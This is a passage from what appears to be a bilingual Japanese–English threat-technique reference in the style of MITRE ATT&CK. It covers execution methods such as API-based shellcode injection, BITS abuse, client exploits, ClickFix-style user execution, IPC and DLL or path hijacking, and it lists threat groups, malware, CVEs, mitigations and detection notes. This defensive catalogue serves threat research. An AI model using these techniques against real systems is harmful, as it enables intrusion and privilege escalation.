`ZwQuerySystemInformation`. CLAIMLOADER has used various Windows API calls during execution, when establishing persistence and defense evasion. CLAIMLOADER has also leveraged the legitimate API functions to run its shellcode through the callback function, including `GetDC()` and `EnumFontsW()`. CLAIMLOADER established persistence by utilizing the API `SHSetValue()`. CLAIMLOADER has utilized APIs with callback functions such as `EnumpropsExW`, `EnumSystemLanguageGroupsA`, and `EnumCalendarInfoExW`. CANONSTAGER has leveraged Native API calls to execute code within the victim’s system including `GetCurrentDirectoryW`, `RegisterClassW` and `CreateWindowExW`. CANONSTAGER also created a new overlapped window that initiates callback functions to a windows procedure that processes Windows messages until a designated message type of 0x0018 WM_SHOWWINDOW is observed which then initiates the deployment of a subsequent malicious payload. TONESHELL has utilized Native Windows API functions such as `WriteProcessMemory` and `CreateRemoteThreadEx`. TONESHELL has also utilized Windows API functions for creating seed values including `CoCreateGuid` and `GetTickCount`. TONESHELL has leveraged the legitimate API function `EnumSystemLocalesA` to run its shellcode through the callback function. Qilin can attempt to log on to the local computer via `LogonUserW` and use `GetLogicalDrives()` and `EnumResourceW()` for discovery. Medusa Ransomware has leveraged Windows Native API functions to execute payloads. Embargo has leveraged Windows Native API functions to execute its operations. SystemBC has utilized native Windows API functions such as `EnumWindows`and `GetVolumeInformationA` during discovery activities. HTTPTroy has leveraged Windows Native API calls, including `GetProcAddress` to execute functions in memory. TRAILBLAZE has leveraged raw syscalls to execute commands. Caminho can use `System.Net.WebClient.downloadString()` for file download. HeartCrypt can use Windows API functions to modify the Registry and `FindResourceW`, `LoadResource`, and `LockResource` to acquire a pointer to corresponding code resources. LODEINFO can use Windows APIs such as `VirtualAllocEx()`, `WriteProcessMemory()`, `CreateRemoteThread()`, `NtAllocateVirtualMemory()`, `NtWriteVirtualMemory()`, and `RtlCreateUserThread()` to enable memory injection of shellcode. DOWNIISSA can use the `URLDownloadToFileA()` API to download from remote resources. NOOPLDR can use native APIs `NtProtectVirtualMemory`, `NtWriteVirtualMemory`, and `NtCreateThreadEx` to aid process injection. ANELLDR can use the `ZwSetInformationThread` to enable debugger evasion. MuddyViper has the ability to relaunch itself using the `CreateProcessW` API. Fooder has used the WinCrypt API for payload decryption, `DuplicateTokenEx` to duplicate the token of a specified process, and `CreateProcessAsUserA` for payload execution. LP-Notes has used the `ImpersonateLoggedOnUser` API to impersonate the security context of the taskhostw.exe process. Additionally, LP-Notes has also used the `CredUIPromptForWindowsCredentialsW` API to obtain Windows credentials. RustyWater has used `CreateObject` to instantiate a WScript.Shell Component Object Model (COM) object.  Additionally, RustyWater has used `VirtualAllocEx` and `WriteProcessMemory` to inject shellcode into explorer.exe. DynoWiper has used multiple native Windows functions, such as `GetLogicalDrives` and `FindNextFile` for discovery and file deletion. 敵対者は、署名済みの開発ツールを悪用して悪意あるコードをプロキシ実行することがある。 Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions. 敵対者は、MSBuildを悪用して署名済みプロセス経由でコードを実行することがある。Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations. 敵対者は、ClickOnceを悪用してコードを実行することがある。Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility. ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application. 敵対者は、JamPlusを悪用してコードを実行することがある。Adversaries may use `JamPlus` to proxy the execution of a malicious script. `JamPlus` is a build utility tool for code and data build systems. It works with several popular compilers and can be used for generating workspaces in code editors such as Visual Studio. 危険なWebコンテンツへのアクセスを制限する。 許可されていないコードの実行を防止する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 信頼された開発ツールによるプロキシ実行に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、共有モジュール（DLL等）のロード機構を悪用してコードを実行することがある。 Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API). 許可されていないコードの実行を防止する。 共有モジュールに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Mustang Panda has leveraged `LoadLibrary` to load DLLs. gh0st RAT can load DLLs into memory. PUNCHBUGGY can load a DLL using the LoadLibrary API. Hydraq creates a backdoor through which remote attackers can load and call DLL functions. For network communications, OSX_OCEANLOTUS.D loads a dynamic library (`.dylib` file) using `dlopen()` and obtains a function pointer to execute within that shared library using `dlsym()`. Astaroth uses the LoadLibraryExW() function to load additional modules. Ebury is executed through hooking the keyutils.so file used by legitimate versions of `OpenSSH` and `libcurl`. BOOSTWRITE has used the DWriteCreateFactory() function to load additional modules. Attor's dispatcher can execute additional plugins by loading the respective DLLs. Metamorfo had used AutoIt to load and execute the DLL payload. TajMahal has the ability to inject the <code>LoadLibrary</code> call template DLL into running processes. PipeMon has used call to <code>LoadLibrary</code> to load its installer. PipeMon loads its modules using reflective loading or custom shellcode. BLINDINGCAN has loaded and executed DLLs in memory during runtime on a victim machine. Dtrack contains a function that calls <code>LoadLibrary</code> and <code>GetProcAddress</code>. Stuxnet calls LoadLibrary then executes exports from a DLL. KillDisk loads and executes functions from a DLL. FoggyWeb's loader can call the <code>load()</code> function to load the FoggyWeb dll into an Application Domain on a compromised AD FS server. DarkWatchman can load DLLs. Bumblebee can use `LoadLibrary` to attempt to execute GdiPlus.dll. RotaJakiro uses dynamically linked shared libraries (`.so` files) to execute additional functionality using `dlopen()` and `dlsym()`. VersaMem relied on the Java Instrumentation API and Javassist to dynamically modify Java code existing in memory. LightSpy's main executable and module `.dylib` binaries are loaded using a combination of `dlopen()` to load the library, `_objc_getClass()` to retrieve the class definition, and `_objec_msgSend()` to invoke/execute the specified method in the loaded class. 敵対者は、Windowsのバックグラウンドインテリジェント転送サービス(BITS)を悪用してダウンロードや実行・永続化を行うことがある。 Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. アカウントの作成・権限・ライフサイクルを適切に管理する。 OSを安全に構成し、攻撃対象領域を縮小する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 BITSジョブに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Patchwork has used BITS jobs to download malicious payloads. Leviathan has used BITSAdmin to download additional tools. APT39 has used the BITS protocol to exfiltrate stolen data from a compromised host. APT41 used BITSAdmin to download and install payloads. Wizard Spider has used batch scripts that utilizes WMIC to execute a BITSAdmin transfer of a ransomware payload to each compromised machine. Cobalt Strike can download a hosted "beacon" payload using BITSAdmin. BITSAdmin can be used to create BITS Jobs to launch a malicious process. A JPIN variant downloads the backdoor payload via the BITS service. UBoatRAT takes advantage of the /SetNotifyCmdLine option in BITSAdmin to ensure it stays running on a system to maintain persistence. Bazar has been downloaded via Windows BITS functionality. Egregor has used BITSadmin to download and execute malicious DLLs. MarkiRAT can use BITS Utility to connect with the C2 server. ProLock can use BITS jobs to download its malicious payload. 敵対者は、クライアントアプリの脆弱性を悪用してコードを実行することがある。 Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility. アプリを分離・サンドボックス化し、影響範囲を限定する。 エクスプロイト保護機能で脆弱性悪用を防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 クライアント実行のための脆弱性悪用に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors exploited CVE-2017-11882 to execute code on the victim's machine. During Operation Dust Storm, the threat actors exploited Adobe Flash vulnerability CVE-2011-0611, Microsoft Windows Help vulnerability CVE-2010-1885, and several Internet Explorer vulnerabilities, including CVE-2011-1255, CVE-2012-1889, and CVE-2014-0322. Mustang Panda used the GrimResource exploitation technique via specially crafted MSC files for arbitrary code execution during RedDelta Modified PlugX Infection Chain Operations. During RedPenguin, UNC3886 exploited CVE-2025-21590 to bypass Veriexec protections in Junos OS designed to prevent unauthorized binary execution. During the 3CX Supply Chain Attack, AppleJeus leveraged the Chrome vulnerability, CVE-2022-0609, in combination with a Drive-by Compromise website. Axiom has used exploits for multiple vulnerabilities including CVE-2014-0322, CVE-2012-4792, CVE-2012-1889, and CVE-2013-3893. APT12 has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities (CVE-2009-3129, CVE-2012-0158) and vulnerabilities in Adobe Reader and Flash (CVE-2009-4324, CVE-2009-0927, CVE-2011-0609, CVE-2011-0611). APT28 has exploited Microsoft Office vulnerability CVE-2017-0262 for execution. Darkhotel has exploited Adobe Flash vulnerability CVE-2015-8651 for execution. APT29 has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution. admin@338 has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158. APT3 has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776. Threat Group-3390 has exploited CVE-2018-0798 in Equation Editor. Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution. Sandworm Team has exploited vulnerabilities in Microsoft PowerPoint via OLE objects (CVE-2014-4114) and Microsoft Word via crafted TIFF images (CVE-2013-3906). Dragonfly has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system. Patchwork uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641. OilRig has exploited CVE-2024-30088 to run arbitrary code in the context of `SYSTEM`. APT32 has used RTF document that includes an exploit to execute malicious code. (CVE-2017-11882) BRONZE BUTLER has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution. TA459 has exploited Microsoft Word vulnerability CVE-2017-0199 for execution. APT33 has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and attempted to gain remote code execution via a security bypass vulnerability (CVE-2017-11774). Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882. Elderwood has used exploitation of endpoint software, including Microsoft Internet Explorer Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits. APT37 has used exploits for Flash Player (CVE-2016-4117, CVE-2018-4878), Word (CVE-2017-0199), Internet Explorer (CVE-2020-1380 and CVE-2020-26411), and Microsoft Edge (CVE-2021-26411) for execution. MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution. Cobalt Group had exploited multiple vulnerabilities for execution, including Microsoft’s Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-2017-8570, CVE-2017-0199, and CVE-2017-8759. Tropic Trooper has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158. The White Company has taken advantage of a known vulnerability in Microsoft Word (CVE 2012-0158) to execute code. APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396. BlackTech has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities CVE-2012-0158, CVE-2014-6352, CVE-2017-0199, and Adobe Flash CVE-2015-5119. Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution. Sidewinder has exploited vulnerabilities to gain execution including CVE-2017-11882 and CVE-2020-0674. Higaisa has exploited CVE-2018-0798 for execution. Mustang Panda has exploited CVE-2017-0199 in Microsoft Word to execute code. Tonto Team has exploited Microsoft vulnerabilities, including CVE-2018-0798, CVE-2018-8174, CVE-2018-0802, CVE-2017-11882, CVE-2019-9489 CVE-2020-8468, and CVE-2018-0798 to enable execution of their delivered malicious payloads. Transparent Tribe has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution. Andariel has exploited numerous ActiveX vulnerabilities, including zero-days. Confucius has exploited Microsoft Office vulnerabilities, including CVE-2015-1641, CVE-2017-11882, and CVE-2018-0802. BITTER has exploited Microsoft Office vulnerabilities CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802. Ember Bear has used exploits to enable follow-on execution of frameworks such as Meterpreter. Aoqin Dragon has exploited CVE-2012-0158 and CVE-2010-3333 for execution against targeted systems. EXOTIC LILY has used malicious documents containing exploits for CVE-2021-40444 affecting Microsoft MSHTML. Saint Bear has leveraged vulnerabilities in client applications such as CVE-2017-11882 in Microsoft Office to enable code execution in victim environments. Sea Turtle has used exploits for vulnerabilities such as CVE-2021-44228, CVE-2021-21974, and CVE-2022-0847 to achieve client code execution. UNC3886 has exoloited CVE-2023-34048 to enable command execution on vCenter servers and CVE-2023-20867 in VMware Tools to execute unauthenticated Guest Operations from ESXi hosts to guest VMs. Cobalt Strike can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460. Bankshot leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims’ machines. DealersChoice leverages vulnerable versions of Flash to perform execution. InvisiMole has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution. Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery. Xbash can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution. SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager. HAWKBALL has exploited Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802 to deliver the payload. EvilBunny has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader. Ramsay has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570. SUPERNOVA was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148). Woody RAT has relied on CVE-2022-30190 (Follina) for execution during delivery. VersaMem was installed through exploitation of CVE-2024-39717 in Versa Director servers. XLoader has exploited Office vulnerabilities during local execution such as CVE-2017-11882 and CVE-2018-0798. 敵対者は、ユーザーに悪意あるファイルやリンクを開かせることでコードを実行させることがある。 An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing. 敵対者は、ユーザーに悪意あるリンクをクリックさせてコードを実行させることがある。An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Link. Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via Exploitation for Client Execution. Links may also lead users to download files that require execution via Malicious File. 敵対者は、ユーザーに悪意あるファイルを開かせてコードを実行させることがある。An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, .reg, and .iso. 敵対者は、悪意あるコンテナイメージをユーザーに実行させることがある。Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via Upload Malware, and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container. 敵対者は、悪意あるコマンドをコピー&ペーストさせて実行させることがある。An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a Command and Scripting Interpreter. One such strategy is "ClickFix," in which adversaries present users with seemingly helpful solutions—such as prompts to fix errors or complete CAPTCHAs—that instead instruct the user to copy and paste malicious code. 敵対者は、ユーザーに悪意あるライブラリを読み込ませて実行させることがある。Adversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may Upload Malware to package managers such as NPM and PyPi, as well as to public code repositories such as GitHub. User may install libraries without realizing they are malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that establishes persistence, steals data, or mines cryptocurrency. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 危険なWebコンテンツへのアクセスを制限する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 ソフトウェアのインストールを制限し、不正なプログラム導入を防ぐ。 許可されていないコードの実行を防止する。 エンドポイントで悪意ある挙動を検出・防止する。 ユーザー実行に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Water Curupira Pikabot Distribution requires users to interact with malicious attachments in order to start Pikabot installation. LAPSUS$ has recruited target organization employees or contractors who provide credentials and approve an associated MFA prompt, or install remote management software onto a corporate workstation, allowing LAPSUS$ to take control of an authenticated system. Scattered Spider has impersonated organization IT and helpdesk staff to instruct victims to execute commercial remote access tools to gain initial access. Raspberry Robin execution can rely on users directly interacting with malicious LNK files. Lumma Stealer has been distributed through a fake CAPTCHA that presents instructions to the victim to open Windows Run window (“Windows Button + R”) and paste clipboard contents (“CTRL + V”) and press “Enter” to execute a Base64-encoded PowerShell. 敵対者は、プロセス間通信(IPC)機構を悪用してコードを実行することがある。 Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. 敵対者は、COMを悪用してプロセス間でコードを実行することがある。Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE). Remote COM execution is facilitated by Remote Services such as Distributed Component Object Model (DCOM). 敵対者は、DDEを悪用してコードを実行することがある。Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. 敵対者は、XPCサービスを悪用してmacOSでコードを実行することがある。Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon. 開発者に対し、脆弱性を生まない安全な設計・実装の指針を提供する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 エンドポイントで悪意ある挙動を検出・防止する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 アプリを分離・サンドボックス化し、影響範囲を限定する。 ソフトウェアを安全に構成し、悪用を防ぐ。 プロセス間通信に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation MidnightEclipse, threat actors wrote output to stdout then piped it to bash for execution. During the 3CX Supply Chain Attack, AppleJeus's VEILEDSIGNAL creates and listens on a Windows named pipe to exchange messages between modules. Uroburos has the ability to move data between its kernel and user mode components, generally using named pipes. HyperStack can connect to the IPC$ share on remote machines. Cyclops Blink has the ability to create a pipe to enable inter-process communication. When executing with non-root permissions, RotaJakiro uses the the `shmget API` to create shared memory between other known RotaJakiro processes. This allows processes to communicate with each other and share their PID. Ninja can use pipes to redirect the standard input and the standard output. PITSTOP can listen over the Unix domain socket located at `/data/runtime/cockpit/wd.fd`. Raspberry Robin contains an embedded custom Tor network client that communicates with the primary payload via shared process memory. LunarWeb can retrieve output from arbitrary processes and shell commands via a pipe. ROADSWEEP can pipe command output to a targeted process. OilBooster can read the results of command line execution via an unnamed pipe connected to the process. StealBit can use interprocess communication (IPC) to enable the designation of multiple files for exfiltration in a scalable manner. The Havoc SMB demon can use named pipes for communication through a parent demon. TONESHELL has facilitated inter-process communication between DLL components via the use of pipes. TONESHELL has also created a reverse shell using two anonymous pipes to write data to stdin and read data from stdout and stderr. Medusa Ransomware has leveraged the `CreatePipe` API to enable inter-process communication. SPAWNCHIMERA has leveraged IPC using a UNIX domain socket between the dsmdm process and the web process. 敵対者は、システムサービスの仕組みを悪用してコマンドやペイロードを実行することがある。 Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary execution. 敵対者は、launchctlを悪用してmacOSでサービスを実行することがある。Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. 敵対者は、サービス実行機構を悪用してWindowsでコードを実行することがある。Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services. The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and Net. 敵対者は、systemctlを悪用してLinuxでサービスを実行することがある。Adversaries may abuse systemctl to execute commands or programs. Systemctl is the primary interface for systemd, the Linux init system and service manager. Typically invoked from a shell, Systemctl can also be integrated into scripts or applications. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 エンドポイントで悪意ある挙動を検出・防止する。 システムサービスに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、プログラムの実行フロー（DLL探索順等）を乗っ取って悪意あるコードを実行することがある。 Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. 敵対者は、DLL探索順やサイドローディングを悪用して実行フローを乗っ取ることがある。Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking. 敵対者は、dylibハイジャックでmacOSの実行フローを乗っ取ることがある。Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added. 敵対者は、実行可能インストーラのファイル権限の弱点を悪用することがある。Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. 敵対者は、動的リンカーを悪用して実行フローを乗っ取ることがある。Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from various environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name. Each platform's linker uses an extensive list of environment variables at different points in execution. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions in the original library. 敵対者は、PATH環境変数を悪用してパスを横取りすることがある。Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. 敵対者は、検索順ハイジャックでパスを横取りすることがある。Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. 敵対者は、引用符なしパスを悪用してパスを横取りすることがある。Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. 敵対者は、サービスのファイル権限の弱点を悪用することがある。Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. 敵対者は、サービスのレジストリ権限の弱点を悪用することがある。Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services can allow adversaries to redirect the originally specified executable to one they control, launching their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, PowerShell, or Reg. Access to Registry keys is controlled through access control lists and user permissions. 敵対者は、COR_PROFILERを悪用して実行フローを乗っ取ることがある。Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. 敵対者は、KernelCallbackTableを悪用して実行フローを乗っ取ることがある。Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads. The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded. 敵対者は、AppDomainManagerを悪用して.NETの実行フローを乗っ取ることがある。Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code. 開発者に対し、脆弱性を生まない安全な設計・実装の指針を提供する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 レジストリキーの権限を制限し、不正な改変を防ぐ。 許可されていないコードの実行を防止する。 エンドポイントで悪意ある挙動を検出・防止する。 ライブラリのロードを制限し、不正なコード実行を防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 UACを適切に構成し、権限昇格を防ぐ。 実行フローの乗っ取りに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries. Pikabot Distribution February 2024 utilized a tampered legitimate executable, `grepWinNP3.exe`, for its first stage Pikabot loader, modifying the open-source tool to execute malicious code when launched. Denis replaces the nonexistent Windows DLL "msfte.dll" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe. ShimRat can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls. One of Dtrack can replace the normal flow of a program execution with malicious code. Saint Bot will use the malicious file <code>slideshow.mp4</code> if present to load the core API provided by <code>ntdll.dll</code> to avoid any hooks placed on calls to the original <code>ntdll.dll</code> file by endpoint detection and response or antimalware software. COATHANGER will remove and write malicious shared objects associated with legitimate system functions such as `read(2)`. DarkGate edits the Registry key <code>HKCU\Software\Classes\mscfile\shell\open\command</code> to execute a malicious AutoIt script. When eventvwr.exe is executed, this will call the Microsoft 